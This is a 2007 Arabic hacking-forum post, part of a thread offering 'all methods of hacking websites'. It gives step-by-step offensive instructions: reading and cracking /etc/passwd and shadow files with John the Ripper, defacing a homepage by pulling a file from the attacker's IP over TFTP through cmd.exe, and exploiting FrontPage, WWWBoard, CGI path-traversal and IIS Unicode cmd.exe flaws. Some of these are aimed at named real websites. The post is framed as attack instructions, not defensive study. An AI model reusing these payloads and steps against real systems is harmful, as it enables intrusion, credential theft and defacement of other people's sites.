صيف كام سعودي كام شات غرور كام شات غزل كام شات الوله شات حبي شات صوتي
منتدى دمعـــة ولـــه - عرض مشاركة واحدة - جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصريا على دمعة وله
الموضوع: جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصريا على دمعة وله
عرض مشاركة واحدة
قديم 07-12-2007, 07:51 PM   #2

الصورة الرمزية الفهد المفترس
الفهد المفترس غير متواجد حالياً

بيانات اضافيه [ + ]
 رقم العضوية : 969
 تاريخ التسجيل :  Feb 2007
 أخر زيارة : 07-02-2012 (01:46 AM)
 المشاركات : 3,825 [ + ]
 التقييم :  10
لوني المفضل : Cadetblue
افتراضي رد: جميع طرق اختراق المواقع مهم جدا جدا جدا Vip حصريا على دمعة وله


20- هناك انظمة وملقمات كثيرة منها:
Apache (الملقم)
IIS(الملقم)
SunOS(الملقم)
FreeBSD (My BaBe)(الملقم)
OpenBSD(الملقم)
NetBSD(الملقم)
AIX(الملقم)
IRIX(الملقم)
NetScape(الملقم)
Enterprise(الملقم)
Windows/NT/2000/xp (نظام التشغيل)
Linux(نظام الشتغيل )
-------------------------------------------------------------------
له ست مجلدات) 21- (اليونكس

خاص بالملفات الثنائيه يعني اللي تشغل النظام bin
ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd etc
ملفات الاجهزه dev
مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل lib
الملفات الموقته او غير الثابته tmp
اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام usr


--------------------------------------------------------------------
22- (اوامر الاف تي بي)
لكي تعرف ما يحتويه الهارد ديسك Pwd
لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Cd
لكي يتضح لك محتوى المجلد أو الهارد ديسك Ls
لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Get
العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Put
لقطع الإتصال مع الضحية Clos


يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
START > RUN > ftp -n hostname
----------------------------------------------------------------------------
23- بورتات برامج:-
7 echo
21 telnet
23 ftp
25 smtp
80 http
110 POP
----------------------------------------------------------------------------
c - 24
هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
Linux او ****l Account
----------------------------------------------------------------------------
25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
Error
وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
---------------------------------------------------------------------------
26 -(كيف تحصل على شيل اكاونت مجانا)

و تنقسم الشيل اكونتس الي نوعين:
1-restricted
2-non-restricted
و الفرق بينهما ان
restricted
مدفوع القيمه و يمكنك من تنفيذ اي
command
اما ال
non restricted
فهو مجاني
و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
www.cyberarmy.com
او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها
بالتالي:
1-telnet
2-nslookup و الذي يعطيك معلومات عن المضيف
3-ftp
4-finger
4-trace route
5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
6-netstat
7-gcc و هذا كمبيلير للغه البرمجه c
8-gzip لفك ضغط الملفات
9-lynx متصفح للانترنت

------------------------------------------------------------------
تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27
.TFTP
-=-=-=-=-=-=-=-=-=-=-=-=-
قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
index.htm
على الـ
c:\
قم بتشغيل برنامج
TFTP
:ونفذ الامر في الفقرة التالية
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. htm
tftp.exe
وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
"-i"
وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
1.1.1.1 رقم الايبي الخاص بك
GET
وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
index.htm
اسم الملف بجهازك
\inetpub\wwwroot\
اسم الدليل في السيرفر
index.htm
اسم الملف على السيرفر
-----------------------------------------------------------------
تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28
www.sitename.com:2082
أو
www.sitename.com/cpanel
هذا في حال كان الموقع يستخدم الـ
CPanel
وهو البرنامج الأكثر شيوعاً ..
ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
وتصير في الداخل.
----------------------------------------------------------------
29- اماكن تواجد ملف باسوورد المواقع:
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز ******s/passwd
----------------------------------------------------------------
30- كيف اتاكد انا الثغر شغالة ولا لا؟
- جرب اللثغرة بواسطة الـ
URL او الـ URI .
----------------------------------------------------------------
31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟
(IIS4.0 on WinNT)
http://www.microsoft.com/ntserver/nt...62/default.asp
(IIS5.0 on Win2000)
www.microsoft.com/windows200...862/default.asp
----------------------------------------------------------------
32 - ما الفرق بين ملف الباسورد المشفر
encryption
والمضلل
shadowed?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الملف المضلل
shadow file
يكون مكان كلمة المرور رمز مثل
*
أو
x
أو
#
أو
!
وهذا مثال لها
root:0Super-User:/:/sbin/sh
لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
root:Q71KBZlvYSnVw:0Super-User:/:/sbin/sh
هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw
-------------------------------------------------------------------
وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير.
-------------------------------------------------------------------
34 -اذا كان ملف
passwd
مضلل ماذا تفعل؟
الان جميع ملفات
passwd
تكون مضللة ولكن توجد طريقة لفكها
اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
shadow
ماهي اماكن تواجد ملف
shadow
في الأنظمة؟
وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي:
Linux : /etc/shadow token = *
SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
IRIX : /etc/shadow token = x
AIX : /etc/security/passwd token = !
ConvexOS : /etc/shadow or /etc/shadpw token = *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
token
تعني الرمز الذي يوجد في الملف
passwd
وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في
/etc/security/passwd
، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه).
ملف الشادوا تكون الكلام الذي فيه مشفر
الخظوة الأخيرة وهي دمج ملف
shadow & passwd
انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج
**********************************************
http://packetstorm.securify.com/Crackers/john-16w.zip
http://www.geocities.com/wildxone2002/john16.zip
http://www.diabolo666-security.com/...er/john-16d.zip
**********************************************
انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
الامر هو
unshadow passwd.txt shadow.txt
اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة
x
التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x
تكون في ملف الباس
-------------------------------------------------------------------
35- فك تشفير ملف
shadow
asswd بعد دمجه مع ملف
x وهو طريقة فك تشفير ملف
passwd
الدليل الكامل لكسر كلمات السر
برنامج
John the Ripper
لكسر كلمات السر
-----------------------------------------------------------------
برنامج - 36
(John the Ripper)
احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
(nix*)
وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
(PASSWD)
بان يكون مضلل وعلى المخترق الحصول على ملف
(SHADOW)
لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
----------------------------------------------------------------
37 - كيف استغلال الباسورد:
يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
كيفية الدخول ب
ftp
يمكنك استخدام احد برامج ال
ftp
منها
ws_ftp
او
CuteFTP 4.2.5 Build 10.4.1
وعنوانه هنا للتحميل
---------------------------------------------------------------------
38 - طريقة تنفيذ الثغرات:

مكان تنفيذ الثغرات
http://www.xxxxx.com/******s/..&Aa....exe?/c+dir+c:\
أي بعد دوت كوم
بعض الناس يسألون مالذي يظهر او على اي شكل يظهر
الحل بسيط
هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات
Dir
وطريقة ظهور الملفات في المتصفح تقريبا
بنفس طريقة الدوس
--------------------------------------------------------------------
2-(شرح الثغرات واستغلالها)
1 - شرح ثغرة الفرونت بيج وكيفية استغلالها:

ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل
www.****.com/_vti_pvt
يعني الثغرة هي
_vti_pvt
ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف

ملاحظة:-
تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها
لتعرق اذا الموقع مصمم بالفرونت بيج من موقع
http://www.netcraft.net
تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله
ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو
service.pwd
نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل
-FrontPage-
ekendall:bYld1Sr73NLKo
louisa:5zm94d7cdDFiQ
هنا نرى ان الموقع عليه مشرفين
ekendall
و
louisa
نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج
file
open web
وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين
save or publish
بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط
sign
وهذا موقع للتطبيق
http://www.heyerlist.org/garderobe/_vti_pvt
-------------------------------------------------------------------
2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها:


ثغرة الـ
WWWBoard
هي أسهل ثغرة بالإضافة إلى الفرونت بيج.
لنفترض أن الموقع المراد إختراقه هو
http://www.boardprep.net/
لنضف إليه
wwwboard/passwd.txt
فيصبح العنوان
http://www.boardprep.net/wwwboard/passwd.txt
نفتح العنوان سوف تجد
cknouse:aexMVWnDOyrdE
كلمة المرور+ إسم المستخدم
يعني إسم المستخدم هو
cknouse
وكلمة المرور هي
aexMVWnDOyrdE
فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية
روح للفتب وإكتب ftp.domen.com
ملاحظة إستبدل
domen.com
بإسم الموقع إلي عندك باسوورده
وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم
index.html
وإرفعها للموقع
لتحميل الفتب
هنـــــــــا
--------------------------------------------------------------------
3 - شرح ثغرة سي جي اي وكيفية استغلالها:

CGI bugs
وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي
ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح.
الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل
/cgi-bin/passwd.txt
إذا كان الموقع هو
www.somesite.com
فتكتب الثغرة هكذا في المتفح
www.somesite.com/cgi-bin/passwd.txt
هذه الثغرة تعرض لك أسماء المستخدمين وكلمات
المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع
طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
استغلال العيب في ملفات
Cgi & Perl
للوصول الى
etc/passwd



اولا: سناخذ الثغرات من نوع
Show Files
اولا عند وجود هذا الملف
/cgi-bin/apexec.pl?
الباسوورد علينا استغلال هذه الثغرة للوصول الى
http://www.target.com/cgi-bin/apexe...te=../../../../
../../../../../etc/resolv.conf%00.html&passurl=/category/
مع امكانية تغيير
path
بالملف المراد
هذا من جهة البيرل ونفس الكلام ينطبق على السي جي اي
/cgi-bin/hsx.cgi?
عند وجود هذا الملف في
/cgi-bin/
طبق الثغرة التالية
http://www.Target.com/cgi-bin/hsx.c..../etc/passwd%00
الطريقة المثلى للبحث عن هذه الملفات اما بالاختراق العشوائي او عن استخدام برنامج سكان للبحث عن ثغرات في الموقع ضع هذه الملفات ضمن لائحة الثغرات
مثل /cgi-bin/hsx.cgi?
وعند وجوده يتم تطبيق ثغرته.
-------------------------------------------------------------------
4 - شرح ثغرة اي اي اس وكيفية استغلالها:

IIS = Inetnet Information Service
و نستخدم ثغراته المعروفه باليونيكودز
Unicodes
و هي كثيره جدا و انا اعني ما اقول
مثل :
**********************************************
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Agra...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu...d.exe?/c+dir+c:
http://www.xxxx.com/******s/..&Aacu.../cmd.exe?/c+dir +c:
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:
*************************************************